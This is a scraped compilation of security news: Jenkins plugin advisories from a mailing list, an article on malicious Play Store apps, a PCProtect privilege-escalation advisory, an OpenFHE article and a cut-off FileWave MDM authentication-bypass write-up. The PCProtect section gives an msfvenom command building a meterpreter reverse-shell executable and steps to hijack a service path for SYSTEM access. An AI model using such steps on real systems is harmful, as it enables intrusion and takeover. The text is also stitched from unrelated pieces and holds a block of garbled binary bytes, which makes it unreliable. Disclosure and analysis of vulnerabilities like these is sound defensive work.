Jenkins Compuware zAdviser API Plugin 1.0.3 and earlier does not restrict execution of a controller/agent message to agents, allowing attackers able to control agent processes to retrieve Java system properties.

CVE-2022-36900: Jenkins Security Advisory 2022-07-27

Jenkins Lucene-Search Plugin 370.v62a5f618cd3a and earlier does not perform a permission check in several HTTP endpoints, allowing attackers with Overall/Read permission to reindex the database and to obtain information about jobs otherwise inaccessible to them.

CVE-2022-36910: Jenkins Security Advisory 2022-07-27

Jenkins Repository Connector Plugin 2.2.0 and earlier does not perform a permission check in a method implementing form validation, allowing attackers with Overall/Read permission to check for the existence of an attacker-specified file path on the Jenkins controller file system.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 27 Jul 2022 15:48:59 +0200
From: Daniel Beck <ml@...kweb.net>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities in Jenkins plugins

Jenkins is an open source automation server which enables developers around
the world to reliably build, test, and deploy their software.

The following releases contain fixes for security vulnerabilities:

\* Compuware ISPW Operations Plugin 1.0.9
\* Compuware Source Code Download for Endevor, PDS, and ISPW Plugin 2.0.13
\* Compuware Topaz Utilities Plugin 1.0.9
\* Compuware Xpediter Code Coverage Plugin 1.0.8
\* Compuware zAdviser API Plugin 1.0.4
\* Deployer Framework Plugin 86.v7b\_a\_4a\_55b\_f3ec
\* External Monitor Job Type Plugin 192.ve979ca\_8b\_3ccd
\* Git client Plugin 3.11.1
\* Git Plugin 4.11.4
\* GitHub Plugin 1.34.5
\* HashiCorp Vault Plugin 355.v3b\_38d767a\_b\_a\_8
\* Job Configuration History Plugin 1156.v536a\_97b\_8d649
\* rhnpush-plugin Plugin 0.5.2
\* rpmsign-plugin Plugin 0.5.1

Additionally, we announce unresolved security issues in the following
plugins:

\* Android Signing Plugin
\* Buckminster Plugin
\* CLIF Performance Testing Plugin
\* Coverity Plugin
\* Dynamic Extended Choice Parameter Plugin
\* Files Found Trigger Plugin
\* Google Cloud Backup Plugin
\* HTTP Request Plugin
\* Lucene-Search Plugin
\* Maven Metadata Plugin for Jenkins CI server Plugin
\* OpenShift Deployer Plugin
\* Openstack Heat Plugin
\* Repository Connector Plugin

Summaries of the vulnerabilities are below. More details, severity, and
attribution can be found here:
https://www.jenkins.io/security/advisory/2022-07-27/

We provide advance notification for security updates on this mailing list:
https://groups.google.com/d/forum/jenkinsci-advisories

If you discover security vulnerabilities in Jenkins, please report them as
described here:
https://www.jenkins.io/security/#reporting-vulnerabilities

---

SECURITY-1468 / CVE-2022-36881
Git client Plugin 3.11.0 and earlier does not perform SSH host key
verification when connecting to Git repositories via SSH.

This lack of verification could be abused using a man-in-the-middle attack
to intercept these connections.


SECURITY-284 / CVE-2022-36882 (CSRF) & CVE-2022-36883 (permission check) &
CVE-2022-36884 (information disclosure)
Git Plugin provides a webhook endpoint at \`/git/notifyCommit\` that can be
used to notify Jenkins of changes to an SCM repository. For its most basic
functionality, this endpoint receives a repository URL, and Jenkins will
schedule polling for all jobs configured with the specified repository. In
Git Plugin 4.11.3 and earlier, this endpoint can be accessed with GET
requests and without authentication.

In addition to this basic functionality, the endpoint also accept a \`sha1\`
parameter specifying a commit ID. If this parameter is specified, jobs
configured with the specified repo will be triggered immediately, and the
build will check out the specified commit.

Additionally, the output of the webhook endpoint will provide information
about which jobs were triggered or scheduled for polling, including jobs
the user has no permission to access.

This allows attackers with knowledge of Git repository URLs to trigger
builds of jobs using a specified Git repository and to cause them to check
out an attacker-specified commit, and to obtain information about the
existence of jobs configured with this Git repository.

Additionally, this webhook endpoint does not require POST requests,
resulting in a cross-site request forgery (CSRF) vulnerability.


SECURITY-1849 / CVE-2022-36885
GitHub Plugin 1.34.4 and earlier does not use a constant-time comparison
when checking whether the provided and computed webhook signatures are
equal.

This could potentially allow attackers to use statistical methods to obtain
a valid webhook signature.


SECURITY-2762 / CVE-2022-36886
External Monitor Job Type Plugin 191.v363d0d1efdf8 and earlier does not
require POST requests for an HTTP endpoint, resulting in a cross-site
request forgery (CSRF) vulnerability.

This vulnerability allows attackers to create runs of an external job.


SECURITY-2766 / CVE-2022-36887
Job Configuration History Plugin 1155.v28a\_46a\_cc06a\_5 and earlier does not
require POST requests for several HTTP endpoints, resulting in cross-site
request forgery (CSRF) vulnerabilities.

These vulnerabilities allow attackers to delete entries from job, agent,
and system configuration history, or restore older versions of job, agent,
and system configurations.


SECURITY-2593 / CVE-2022-36888
HashiCorp Vault Plugin 354.vdb\_858fd6b\_f48 and earlier does not perform
permission checks in several HTTP endpoints performing Vault connection
tests.

This allows attackers with Overall/Read permission to obtain credentials
stored in Vault with attacker-specified path and keys.


SECURITY-2764 / CVE-2022-36889
Deployer Framework Plugin 85.v1d1888e8c021 and earlier does not restrict
the application path of the applications when configuring a deployment.

This allows attackers with Item/Configure permission to upload arbitrary
files from the Jenkins controller file system to the selected service.


SECURITY-2206 / CVE-2022-36890
Deployer Framework Plugin 85.v1d1888e8c021 and earlier does not restrict
the name of files in methods implementing form validation.

This allows attackers with Item/Read permission to check for the existence
of an attacker-specified file path on the Jenkins controller file system.


SECURITY-2205 / CVE-2022-36891
Deployer Framework Plugin 85.v1d1888e8c021 and earlier does not perform a
permission check in an HTTP endpoint.

This allows attackers with Item/Read permission to read deployment logs.


SECURITY-2402 / CVE-2022-36892
rhnpush-plugin Plugin 0.5.1 and earlier does not perform a permission check
in a method implementing form validation.

This allows attackers with Item/Read permission but without Item/Workspace
or Item/Configure permission to check whether attacker-specified file
patterns match workspace contents. A sequence of requests can be used to
effectively list workspace contents.


SECURITY-2403 / CVE-2022-36893
rpmsign-plugin Plugin 0.5.0 and earlier does not perform a permission check
in a method implementing form validation.

This allows attackers with Item/Read permission but without Item/Workspace
or Item/Configure permission to check whether attacker-specified file
patterns match workspace contents. A sequence of requests can be used to
effectively list workspace contents.


SECURITY-2413 / CVE-2022-36894
CLIF Performance Testing Plugin 64.vc0d66de1dfb\_f and earlier allows users
to extract files from an archive without validating file paths of files
contained within the archive.

This allows attackers with Overall/Read permission to create or replace
arbitrary files on the Jenkins controller file system with
attacker-specified content.

As of publication of this advisory, there is no fix.


SECURITY-2619 / CVE-2022-36895
Compuware Topaz Utilities Plugin 1.0.8 and earlier does not perform
permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate hosts and
ports of Compuware configurations and credentials IDs of credentials stored
in Jenkins. Those credentials IDs can be used as part of an attack to
capture the credentials using another vulnerability.


SECURITY-2621 / CVE-2022-36896
Compuware Source Code Download for Endevor, PDS, and ISPW Plugin 2.0.12 and
earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate hosts and
ports of Compuware configurations and credentials IDs of credentials stored
in Jenkins. Those credentials IDs can be used as part of an attack to
capture the credentials using another vulnerability.


SECURITY-2626 / CVE-2022-36897
Compuware Xpediter Code Coverage Plugin 1.0.7 and earlier does not perform
permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate hosts and
ports of Compuware configurations and credentials IDs of credentials stored
in Jenkins. Those credentials IDs can be used as part of an attack to
capture the credentials using another vulnerability.


SECURITY-2628 / CVE-2022-36898
Compuware ISPW Operations Plugin 1.0.8 and earlier does not perform
permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate hosts and
ports of Compuware configurations and credentials IDs of credentials stored
in Jenkins. Those credentials IDs can be used as part of an attack to
capture the credentials using another vulnerability.


SECURITY-2629 / CVE-2022-36899
Compuware ISPW Operations Plugin defines a controller/agent message that
retrieves Java system properties.

Compuware ISPW Operations Plugin 1.0.8 and earlier does not restrict
execution of the controller/agent message to agents. This allows attackers
able to control agent processes to retrieve Java system properties.

NOTE: This vulnerability is only exploitable in Jenkins 2.318 and earlier,
LTS 2.303.2 and earlier.


SECURITY-2630 / CVE-2022-36900
Compuware zAdviser API Plugin defines a controller/agent message that
retrieves Java system properties.

Compuware zAdviser API Plugin 1.0.3 and earlier does not restrict execution
of the controller/agent message to agents. This allows attackers able to
control agent processes to retrieve Java system properties.

NOTE: This vulnerability is only exploitable in Jenkins 2.318 and earlier,
LTS 2.303.2 and earlier.


SECURITY-2053 / CVE-2022-36901
HTTP Request Plugin 1.15 and earlier stores HTTP Request passwords
unencrypted in its global configuration file
\`jenkins.plugins.http\_request.HttpRequest.xml\` on the Jenkins controller as
part of its configuration when using (deprecated) Basic/Digest
Authentication.

These passwords can be viewed by users with access to the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2682 / CVE-2022-36902
Dynamic Extended Choice Parameter Plugin 1.0.1 and earlier does not escape
several fields of Moded Extended Choice parameters.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.


SECURITY-2665 (1) / CVE-2022-36903
Repository Connector Plugin 2.2.0 and earlier does not perform permission
checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2665 (2) / CVE-2022-36904
Repository Connector Plugin 2.2.0 and earlier does not perform a permission
check in a method implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system. A sequence of requests can be used to effectively list the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2686 / CVE-2022-36905
Maven Metadata Plugin for Jenkins CI server Plugin 2.2 and earlier does not
perform URL validation for the Repository Base URL of List maven artifact
versions parameters.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.


SECURITY-1375 (1) / CVE-2022-36906 (CSRF) & CVE-2022-36907 (missing permission check)
OpenShift Deployer Plugin 1.2.0 and earlier does not perform a permission
check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an
attacker-specified URL using attacker-specified username and password.

Additionally, this form validation method does not require POST requests,
resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-1375 (2) / CVE-2022-36908 (CSRF) & CVE-2022-36909 (missing permission check)
OpenShift Deployer Plugin 1.2.0 and earlier does not perform permission
checks in methods implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system and to upload a SSH key file from the Jenkins controller file system
to an attacker-specified URL.

Additionally, these form validation methods do not require POST requests,
resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2048 / CVE-2022-36910
Lucene-Search Plugin 370.v62a5f618cd3a and earlier does not perform
permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to reindex the database
and to obtain information about jobs otherwise inaccessible to them.

As of publication of this advisory, there is no fix.


SECURITY-2105 (1) / CVE-2022-36911 (CSRF) & CVE-2022-36912 (missing permission check)
Openstack Heat Plugin 1.5 and earlier does not perform permission checks in
methods implementing form validation.

This allows attackers with Overall/Read permission to connect to an
attacker-specified URL.

Additionally, these form validation methods do not require POST requests,
resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2105 (2) / CVE-2022-36913
Openstack Heat Plugin 1.5 and earlier does not perform permission checks in
methods implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system. A sequence of requests can be used to effectively list the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2210 / CVE-2022-36914
Files Found Trigger Plugin 1.5 and earlier does not perform a permission
check in a method implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system. A sequence of requests can be used to effectively list the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2404 / CVE-2022-36915
Android Signing Plugin 2.2.5 and earlier does not perform a permission
check in a method implementing form validation.

This allows attackers with Item/Read permission but without Item/Workspace
or Item/Configure permission to check whether attacker-specified file
patterns match workspace contents. A sequence of requests can be used to
effectively list workspace contents.

As of publication of this advisory, there is no fix.


SECURITY-2656 / CVE-2022-36916 (CSRF) & CVE-2022-36917 (missing permission check)
Google Cloud Backup Plugin 0.6 and earlier does not perform a permission
check in an HTTP endpoint.

This allows attackers with Overall/Read permission to request a manual
backup.

Additionally, this HTTP endpoint does not require POST requests, resulting
in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2747 / CVE-2022-36918
Buckminster Plugin 1.1.1 and earlier does not perform a permission check in
a method implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system. A sequence of requests can be used to effectively list the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2790 (1) / CVE-2022-36919
Coverity Plugin 1.11.4 and earlier does not perform a permission check in
an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2790 (2) / CVE-2022-36920 (CSRF) & CVE-2022-36921 (permission check)
Coverity Plugin 1.11.4 and earlier does not perform a permission check in
an HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an
attacker-specified URL using attacker-specified credentials IDs obtained
through another method, capturing credentials stored in Jenkins.

Additionally, this HTTP endpoint does not require POST requests, resulting
in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2812 / CVE-2022-36922
Lucene-Search Plugin 370.v62a5f618cd3a and earlier does not escape the
search \`query\` parameter displayed on the search result page.

This results in a reflected cross-site scripting (XSS) vulnerability.

As of publication of this advisory, there is no fix.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-36904: security - Multiple vulnerabilities in Jenkins plugins

As many as 30 malicious Android apps with cumulative downloads of nearly 10 million have been found on the Google Play Store distributing adware.
"All of them were built into various programs, including image-editing software, virtual keyboards, system tools and utilities, calling apps, wallpaper collection apps, and others," Dr.Web said in a Tuesday write-up.
While masquerading as innocuous

As many as 30 malicious Android apps with cumulative downloads of nearly 10 million have been found on the Google Play Store distributing adware.

"All of them were built into various programs, including image-editing software, virtual keyboards, system tools and utilities, calling apps, wallpaper collection apps, and others," Dr.Web said in a Tuesday write-up.

While masquerading as innocuous apps, their primary goal is to request permissions to show windows over other apps and run in the background in order to serve intrusive ads.

To make it difficult for the victims to detect and uninstall the apps, the adware trojans hide their icons from the list of installed apps in the home screen or replace the icons with others that are likely to be less noticed (e.g., SIM Toolkit).

Some of these apps also offer the advertised features, as observed in the case of two apps: "Water Reminder- Tracker & Reminder" and "Yoga- For Beginner to Advanced." However, they also covertly load various websites in WebView, and simulate user actions to click on banners and ads.

Also uncovered are another set of apps distributing the Joker malware in the form of launcher, camera, and emoji stickers apps that, when installed, subscribe users to paid mobile services without their knowledge and consent.

The third category of rogue apps relates to those that pose as image editing software but, in reality, are designed to break into Facebook accounts.

"Upon launching, they asked potential victims to log in to their accounts and then loaded a genuine Facebook authorization page," Dr.Web researchers said. "Next, they hijacked the authentication data and sent it to malicious actors."

*   Photo Editor: Beauty Filter (gb.artfilter.tenvarnist)
*   Photo Editor: Retouch & Cutout (de.nineergysh.quickarttwo)
*   Photo Editor: Art Filters (gb.painnt.moonlightingnine)
*   Photo Editor - Design Maker (gb.twentynine.redaktoridea)
*   Photo Editor & Background Eraser (de.photoground.twentysixshot)
*   Photo & Exif Editor (de.xnano.photoexifeditornine)
*   Photo Editor - Filters Effects (de.hitopgop.sixtyeightgx)
*   Photo Filters & Effects (de.sixtyonecollice.cameraroll)
*   Photo Editor : Blur Image (de.instgang.fiftyggfife)
*   Photo Editor : Cut, Paste (de.fiftyninecamera.rollredactor)
*   Emoji Keyboard: Stickers & GIF (gb.crazykey.sevenboard)
*   Neon Theme Keyboard (com.neonthemekeyboard.app)
*   Neon Theme - Android Keyboard (com.androidneonkeyboard.app)
*   Cashe Cleaner (com.cachecleanereasytool.app)
*   Fancy Charging (com.fancyanimatedbattery.app)
*   FastCleaner: Cashe Cleaner (com.fastcleanercashecleaner.app)
*   Call Skins - Caller Themes (com.rockskinthemes.app)
*   Funny Caller (com.funnycallercustomtheme.app)
*   CallMe Phone Themes (com.callercallwallpaper.app)
*   InCall: Contact Background (com.mycallcustomcallscrean.app)
*   MyCall - Call Personalization (com.mycallcallpersonalization.app)
*   Caller Theme (com.caller.theme.slow)
*   Caller Theme (com.callertheme.firstref)
*   Funny Wallpapers - Live Screen (com.funnywallpapaerslive.app)
*   4K Wallpapers Auto Changer (de.andromo.ssfiftylivesixcc)
*   NewScrean: 4D Wallpapers (com.newscrean4dwallpapers.app)
*   Stock Wallpapers & Backgrounds (de.stockeighty.onewallpapers)
*   Notes - reminders and lists (com.notesreminderslists.app)

Last but not least, also spotted on the app storefront was a rogue communications app known as "Chat Online," which tricks users into providing their mobile phone numbers under the pretext of signing up for online dating services.

In a different version of the same malware, a seemingly real conversation is initiated, only for the app to prompt users to pay for premium access to continue the chat, incurring fraudulent charges.

Although these apps have been purged, it's no surprise that mobile malware has been proven to be resilient, what with the criminal actors constantly finding new ways to bypass protections put in place by Google.

Users are recommended to exercise caution when it comes to downloading apps, Google Play or otherwise, and refrain from granting extensive permissions to apps. Turning on Google Play Protect and scrutinizing app reviews and ratings are other ways to secure devices from malware.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

These 28+ Android Apps with 10 Million Downloads from the Play Store Contain Malware

In the WeChat application 8.0.10 for Android and iOS, a mini program can obtain sensitive information from a user's address book via wx.searchContacts.

�1!.ނ�h�ɧ��&�ޤT�x|�@$K�Y� ��P,������u�՝$I�0�����Zg�+%���,��� ���=�\\� �K��j���C��)QI��rV�;��K��j���Ht�&Τ���Z�R ���8�$L;��L��a���а���}i�BYRr�\`��vl <��ח��d��'LHt���.�f�1�T\]$�ӓ���c���}����#ۨ�y�1i�!m4ISt߷5�N^,��\`�J�k�B�4\[?s��#�<ү\_?þ���0Zy�� $�-ZD�EF1�

CVE-2021-40180

PCProtect Endpoint version 5.17.470 fails to provide sufficient anti-tampering protection that can be leveraged to achieve SYSTEM privileges.

[+] Credits: Yehia Elghaly (aka Mrvar0x)      
[+] Website: https://mrvar0x.com/  
[+] Source:  https://mrvar0x.com/2022/07/21/pcprotect-endpoint-tampering-exploit/

Vendor:  
=============  
www.pcprotect.com

Product:  
===========  
PCProtect Endpoint Protection v5.17.470

PCProtect is a malware detection and antivirus scanner. It uses advanced heuristics and a massive, continuously updated database to detect malware files on Windows, macOS, and Android devices. It also has an iOS app.  
PCProtect also includes additional features, including:  
Web shield - Virtual private network (VPN) - Data breach monitor - Identity theft protection - System optimizer- Password manager- And much more…

Vulnerability Type:  
===================  
Missing Tamper Protection  
Incorrect Authorization

CVE Reference:  
==============  
N/A

Security Issue:  
================  
PCProtect Antivirus prior to version 5.17.470 installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user disabling PCProtect Antivirus and the protection offered by it. Also It lead to Raised privilege to SYSTEM.

That can occurred by modifying a specific registry key.  
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityService  
Change ImagePath path to a malicious executable.

Exploit/POC:  
=============  
Create malicious executable through msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o meta.exe

Modify (ImagePath) with the path of the malicious executable - Restart

Network Access:  
===============  
Local

Severity:  
=========  
High

[+] Disclaimer  
The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).

Mrvar0x

PCProtect Endpoint 5.17.470 Tampering / Privilege Escalation

The open source fully homomorphic encryption library from Duality Technologies is intended to help developers build their own FHE-enabled applications.

While encryption is not a cure-all to address every security challenge, done right, it is an essential component for securing systems, data, and communications. However, doing encryption right is not easy and requires paying careful attention to how it is implemented.

While there are several well-established methods for encrypting data in storage (at rest) and keeping the data encrypted while moving across the network from one system to another (in transit), that isn’t the case for keeping the data encrypted while being processed by applications (in use). Fully homomorphic encryption (FHE) is one way to work with data stored in the cloud or third-party environments while keeping it encrypted.

Several companies have been experimenting with FHE recently. After completing FHE field trials, IBM has begun offering FHE service on IBM Cloud. IBM offers a FHE toolkit for MacOS, iOS, Linux, and Android. Microsoft’s Simple Encrypted Arithmetic Library (SEAL) is a free and open source cross-platform homomorphic encryption library organizations can use to run computations on encrypted data.

FHE currently is slow and has high overhead. Toward that end, Intel is working with Microsoft and DARPA (Defense Advanced Research Projects) to create an ASIC (a specialized microchip customized for a specific purpose) for FHE to help reduce computational overhead and drive down processing time.

And just last week, Duality Technologies released OpenFHE, an open source fully homomorphic encryption library.

"There are several FHE libraries out there, but they suffer from a usability dilemma," said Vinod Vaikuntanathan, co-founder and chief cryptographer at Duality Technologies, in a release. "FHE open source libraries all work on different platforms, implement different features, and have different APIs."

OpenFHE supports advanced FHE features such as bootstrapping, scheme switching, and multiple hardware acceleration backends using the standard Hardware Abstraction Layer (HAL). The associated compilers and other developer tools help developers integrate the library’s encrypted computing capabilities to create their own FHE-enabled applications.

FHE is considered to be the easiest among privacy technology, and OpenFHE is intended to be a “foundational building block” for conducting computations on encrypted data, says Kurt Rohloff, CTO and co-founder of Duality. An example use case allows data providers to encrypt their data locally, aggregate their encrypted data at a central data hub such as a cloud provider, and then run analyses on the data at the hub. All this is possible by using potentially sensitive or private data that doesn’t need to be decrypted.

OpenFHE is the “culmination of years of work” from multiple teams (PALISADE, HElib, and HEAAN) that have “decided to join forces to build the best library possible,” says Rohloff. PALISADE provides a general architecture for an extensible framework that supports multiple post-quantum FHE schemes in a single library, with the ability to integrate general hardware acceleration technologies, he says. HElib provides advanced capabilities for the BGV protocol, allowing for some of the most advanced designs for the most complicated FHE schemes. And finally, HEAAN provides extensive support for CKKS, the protocol most effective for machine learning (ML) applications run on encrypted data.

OpenFHE Brings New Encryption Tools to Developers

An authentication bypass vulnerability exists in FileWave before 14.6.3 and 14.7.x before 14.7.2. Exploitation could allow an unauthenticated actor to gain access to the system with the highest authority possible and gain full control over the FileWave platform.

****By Noam Moshe | July 25, 2022** ****Executive Summary**

*   Team82 has uncovered and disclosed two critical vulnerabilities, CVE-2022-34907 and CVE-2022-34906, in FileWave’s mobile device management (MDM) system.
*   The vulnerabilities are remotely exploitable and enable an attacker to bypass authentication mechanisms and gain full control over the MDM platform and its managed devices. 
*   CVE-2022-34907, an authentication bypass flaw exists in FileWave MDM before version 14.6.3 and 14.7.x, prior to 14.7.2. This vulnerability is similar in nature to the vulnerability that was recently identified in F5 BIG-IP WAF.
*   CVE-2022-34906, a hard-coded cryptographic key, exists in FileWave MDM prior to version 14.6.3 and 14.7.x, prior to 14.7.2.
*   During our research, we found thousands of vulnerable internet-facing FileWave servers in numerous industries, including government agencies, education, and large enterprises.
*   FileWave has addressed these vulnerabilities in a recent update, and users are urged to apply the update. 
*   Team82 wishes to acknowledge and thank FileWave for its cooperation and coordination throughout this disclosure. These vulnerabilities were addressed in a prompt, complete fashion, users were notified, and the vast majority were verified as up to date. 

Below is a demonstration of Team82’s proof-of-concept exploit in action—described in the last section of this report. Our attack compromises the Filewave MDM, then infects each managed device with a phony ransomware sample:

https://claroty.com/wp-content/uploads/2022/07/filewavedemo.mp4

**Introduction**

FileWave MDM is a multi-platform mobile device management solution that allows IT administrators to manage, monitor, and view all of an organization’s devices. Currently, FileWave MDM supports a wide range of devices, from iOS and Android smartphones, MacOS and Windows tablets, laptops and workstations, and smart devices such as televisions.

Through FIleWave MDM, IT administrators can view and manage device configurations, locations, security settings, and other device data. Admins may use the MDM platform to push mandatory software and updates to devices, change device settings, lock, and, when necessary, remotely wipe devices. In order to do so, all managed devices report to the main server at set intervals, and in return, the server can issue commands to the device via file packages, software, and more.

In recent years, there have been attacks against endpoint management products, including one of the more high-profile attacks targeting the Kaseya VSA. Kaseya VSA is used by thousands of service providers for IT management, and it was compromised by the REvil ransomware gang and used to distribute ransomware on endpoints worldwide. More than 1,000 companies suffered substantial downtime because of this attack. 

REvil was able to exploit a zero-day vulnerability in the Kaseya VSA platform to bypass authentication and achieve arbitrary command execution. This allowed the attackers to leverage the standard VSA product functionality to deploy ransomware to managed endpoints. In response, the company shut down its VSA cloud and SaaS servers and issued a security advisory to customers, including those with on-premises deployments of VSA.

This incident shows that this attack vector still applies to management products and we must be vigilant and always on the lookout. 

One of the positive outcomes of Team82’s research was the quick response time by Filewave. Once we notified Filewave they quickly developed and deployed fixes to these issues and actively reached out to their customers. This shows the positive advancement of the response time to security issues by vendors which reduce the attack surface considerably.

**A Powerful Position over Endpoints**

An attacker who is able to compromise the MDM would be in a powerful position to control all managed devices, allowing the attacker to exfiltrate sensitive data such as a device’s serial number, the user’s email address and full name, address, geo-location coordinates, IP address, device PIN codes, and much more. Furthermore, attackers could abuse legitimate MDM capabilities to install malicious packages or executables, and even gain access to the device directly through remote control protocols.

**_Example of data we managed to extract from a Filewave server, containing more than 10,000 managed devices._**

During our research, we were able to identify a critical flaw in the authentication process of the FileWave MDM product suite, allowing us to create an exploit that bypasses authentication requirements in the platform and achieve super\_user access, (the platform’s most privileged user).

By exploiting this authentication bypass vulnerability, we were able to take full control over any internet-connected MDM instance. In our research, we discovered more than 1,100 such instances, each containing an unrestricted number of managed devices. 

This exploit, if used maliciously, could allow remote attackers to easily attack and infect all internet-accessible instances managed by the FileWave MDM, below, allowing attackers to control all managed devices, gaining access to users’ personal home networks, organizations’ internal networks, and much more.

To fully understand the range and relevance of this vulnerability, we had to first know how many organizations actually use this product. In order to do so, we’ve used a few different methods which netted us with more than 1,100 different instances of FileWave MDM, each vulnerable to the vulnerabilities described below. Between those exposed services, we’ve discovered organizations from many different fields, including corporations, schools and educational institutions, government agencies and small-to-medium businesses.

**Technical Details******Looking into CVE-2022-34907: Authentication Bypass****

An important FileWave MDM component is the MDM web server, written in Python using the Django framework. It exposes TCP port 20443 and 20445.

The web server handles not only client devices but also the admin’s GUI application. It retrieves device information from clients, handles device enrollment, and supplies commands to devices. For the admin, the web server returns data about client devices using different query methods, and allows the administrator to control all managed devices, including the ability to change a device configuration remotely, install packages on the device, and remotely control it.

Since this service should be accessible to mobile devices at all times, it is usually exposed to the internet, and handles both clients’ and admins’ requests. Its connectivity makes it a primary target in our research on this platform.

We discovered that this server handles different client types, each authenticating differently. Firstly, there are the mobile devices. By default devices can start the enrollment process and interact with the server without requiring any form of user-based authentication (although the option to require credentials in the enrollment process does exist in FileWave MDM). All enrolled devices are first placed in the “quarantine” group, a logical group of devices that are not part of the organization. This means that all routes that involve device enrollment do not require authentication, however since these routes do not allow us to exfiltrate sensitive data, or to take control over devices, this vector was less explored by us.

**_**FileWave MDM enrollment routes. Through this web server, mobile devices enroll to this specific instance and allow the IT administrators to manage their device.**_**

Then, there is system administrator authentication. This method takes a username/password combination, and returns a valid token. Using this token, the IT admin could retrieve data about devices, change device configurations, and much more. In most cases, this token is checked correctly, and allows only valid users to access routes that require authentication.

**_**The FileWave MDM admin interface. Through this interface, IT administrators can authenticate to the MDM platform.**_**

Lastly, we researched the backend services running on the MDM server, which performs another type of authentication within this service. Except for the MDM web server, there are a few extra services that exist in the FIleWave MDM ecosystem. One service in particular, the scheduler service, also written in Python, caught our attention. Its purpose is to schedule and execute specific tasks that the MDM platform needs to perform, and to call the corresponding callback whenever the tasks are completed.

As part of the business logic of the system, the web server uses the scheduler in many cases, and in return, the scheduler informs the web server whenever a task is finished. In order to do so, the scheduler calls some specific web routes in the web server, routes that are accessible only to authenticated and authorized users in the system. However, the scheduler does not know the administrator’s account details, and instead uses a hardcoded shared secret in order to authenticate to the web server. This shared secret does not change between each installation of FileWave MDM, nor between different versions of the system.

**_**The** SCHEDULER\_SECRET **variable is used by both the scheduler service and web server in order to verify and authenticate the scheduler. This is configured inside this file:** /usr/local/filewave/django/filewave/settings\_common.py._**

In FileWave MDM platform, each route that requires valid authentication must inherit the FWAuthMixin class defined in /usr/local/filewave/django/fwauth/utillity.py (or any class that inherits this class). This check is performed inside the test\_func function, where if this function returns True the request will be fulfilled, and if this function returns False, a 401 Unauthorized will be returned. When we looked into this function we found the code, below, (some code was redacted because it was irrelevant):

**_**The code of the** test\_function **function that decides whether a user is authenticated.**_**

As we can see, this function takes the Authorization header from the HTTP request, and compares it to the scheduler secret (after being base64 decoded). If they match, the request is given the permissions of the super\_user account, which is the system’s administrator account. This means that if we know the shared secret and supply it in the request, we do not need to supply a valid user’s token or know the user’s username and password. Instead we will be granted access to the system using the super\_user’s permissions (which are the highest permissions available).

